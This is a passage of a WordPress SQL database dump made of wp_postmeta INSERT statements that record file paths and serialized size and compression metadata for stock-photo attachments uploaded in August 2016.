INSERT INTO `wp_postmeta` VALUES (5715, 676, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4256;s:6:"height";i:2832;s:4:"file";s:33:"2016/08/shutterstock_56435803.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"shutterstock_56435803-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"shutterstock_56435803-800x532.jpg";s:5:"width";i:800;s:6:"height";i:532;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"shutterstock_56435803-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"shutterstock_56435803-1600x1065.jpg";s:5:"width";i:1600;s:6:"height";i:1065;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_56435803-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_56435803-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"shutterstock_56435803-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"shutterstock_56435803-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (5716, 677, '_wp_attached_file', '2016/08/shutterstock_67406404.jpg'); 
INSERT INTO `wp_postmeta` VALUES (5717, 677, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4288;s:6:"height";i:2848;s:4:"file";s:33:"2016/08/shutterstock_67406404.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"shutterstock_67406404-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"shutterstock_67406404-800x531.jpg";s:5:"width";i:800;s:6:"height";i:531;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"shutterstock_67406404-768x510.jpg";s:5:"width";i:768;s:6:"height";i:510;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"shutterstock_67406404-1600x1063.jpg";s:5:"width";i:1600;s:6:"height";i:1063;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_67406404-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_67406404-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"shutterstock_67406404-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"shutterstock_67406404-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (5718, 678, '_wp_attached_file', '2016/08/shutterstock_90355954.jpg'); 
INSERT INTO `wp_postmeta` VALUES (5719, 678, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5500;s:6:"height";i:3667;s:4:"file";s:33:"2016/08/shutterstock_90355954.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"shutterstock_90355954-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"shutterstock_90355954-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"shutterstock_90355954-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"shutterstock_90355954-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_90355954-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_90355954-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"shutterstock_90355954-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"shutterstock_90355954-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"-1";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (5720, 679, '_wp_attached_file', '2016/08/shutterstock_100205036.jpg'); 
INSERT INTO `wp_postmeta` VALUES (5721, 679, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:6000;s:6:"height";i:3510;s:4:"file";s:34:"2016/08/shutterstock_100205036.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_100205036-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_100205036-800x468.jpg";s:5:"width";i:800;s:6:"height";i:468;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_100205036-768x449.jpg";s:5:"width";i:768;s:6:"height";i:449;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"shutterstock_100205036-1600x936.jpg";s:5:"width";i:1600;s:6:"height";i:936;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_100205036-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_100205036-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_100205036-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_100205036-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"-1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (5722, 680, '_wp_attached_file', '2016/08/shutterstock_120161290.jpg'); 
INSERT INTO `wp_postmeta` VALUES (5723, 680, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4928;s:6:"height";i:3264;s:4:"file";s:34:"2016/08/shutterstock_120161290.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_120161290-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_120161290-800x530.jpg";s:5:"width";i:800;s:6:"height";i:530;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_120161290-768x509.jpg";s:5:"width";i:768;s:6:"height";i:509;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_120161290-1600x1060.jpg";s:5:"width";i:1600;s:6:"height";i:1060;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_120161290-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_120161290-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_120161290-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_120161290-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (5724, 681, '_wp_attached_file', '2016/08/shutterstock_127449692.jpg'); 
INSERT INTO `wp_postmeta` VALUES (5725, 681, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4254;s:6:"height";i:2820;s:4:"file";s:34:"2016/08/shutterstock_127449692.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_127449692-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_127449692-800x530.jpg";s:5:"width";i:800;s:6:"height";i:530;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_127449692-768x509.jpg";s:5:"width";i:768;s:6:"height";i:509;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_127449692-1600x1061.jpg";s:5:"width";i:1600;s:6:"height";i:1061;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_127449692-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_127449692-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_127449692-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_127449692-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (5726, 682, '_wp_attached_file', '2016/08/shutterstock_127449698.jpg'); 
INSERT INTO `wp_postmeta` VALUES (5727, 682, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4256;s:6:"height";i:2819;s:4:"file";s:34:"2016/08/shutterstock_127449698.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_127449698-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_127449698-800x530.jpg";s:5:"width";i:800;s:6:"height";i:530;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_127449698-768x509.jpg";s:5:"width";i:768;s:6:"height";i:509;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_127449698-1600x1060.jpg";s:5:"width";i:1600;s:6:"height";i:1060;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_127449698-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_127449698-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_127449698-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_127449698-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (5728, 683, '_wp_attached_file', '2016/08/shutterstock_153282266.jpg'); 
INSERT INTO `wp_postmeta` VALUES (5729, 683, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5550;s:6:"height";i:3700;s:4:"file";s:34:"2016/08/shutterstock_153282266.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_153282266-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_153282266-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_153282266-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_153282266-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_153282266-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_153282266-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_153282266-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_153282266-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (5730, 684, '_wp_attached_file', '2016/08/shutterstock_158212538.jpg'); 
INSERT INTO `wp_postmeta` VALUES (5731, 684, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5758;s:6:"height";i:3838;s:4:"file";s:34:"2016/08/shutterstock_158212538.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_158212538-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_158212538-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_158212538-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_158212538-1600x1066.jpg";s:5:"width";i:1600;s:6:"height";i:1066;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_158212538-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_158212538-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_158212538-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_158212538-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (5732, 685, '_wp_attached_file', '2016/08/shutterstock_178012379.jpg'); 
INSERT INTO `wp_postmeta` VALUES (5733, 685, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:6000;s:6:"height";i:4004;s:4:"file";s:34:"2016/08/shutterstock_178012379.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_178012379-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_178012379-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_178012379-768x513.jpg";s:5:"width";i:768;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_178012379-1600x1068.jpg";s:5:"width";i:1600;s:6:"height";i:1068;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_178012379-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_178012379-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_178012379-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_178012379-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (5734, 686, '_wp_attached_file', '2016/08/shutterstock_194255531.jpg'); 
INSERT INTO `wp_postmeta` VALUES (5735, 686, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5616;s:6:"height";i:3744;s:4:"file";s:34:"2016/08/shutterstock_194255531.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_194255531-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_194255531-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_194255531-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_194255531-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_194255531-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_194255531-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_194255531-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_194255531-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (5736, 687, '_wp_attached_file', '2016/08/shutterstock_207817831.jpg'); 
INSERT INTO `wp_postmeta` VALUES (5737, 687, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2624;s:6:"height";i:4240;s:4:"file";s:34:"2016/08/shutterstock_207817831.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_207817831-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_207817831-495x800.jpg";s:5:"width";i:495;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:35:"shutterstock_207817831-768x1241.jpg";s:5:"width";i:768;s:6:"height";i:1241;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"shutterstock_207817831-990x1600.jpg";s:5:"width";i:990;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_207817831-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_207817831-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_207817831-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_207817831-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:67;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (5738, 688, '_wp_attached_file', '2016/08/shutterstock_207863086.jpg'); 
INSERT INTO `wp_postmeta` VALUES (5739, 688, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4716;s:6:"height";i:3819;s:4:"file";s:34:"2016/08/shutterstock_207863086.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_207863086-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_207863086-800x648.jpg";s:5:"width";i:800;s:6:"height";i:648;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_207863086-768x622.jpg";s:5:"width";i:768;s:6:"height";i:622;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_207863086-1600x1296.jpg";s:5:"width";i:1600;s:6:"height";i:1296;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_207863086-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_207863086-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_207863086-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_207863086-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright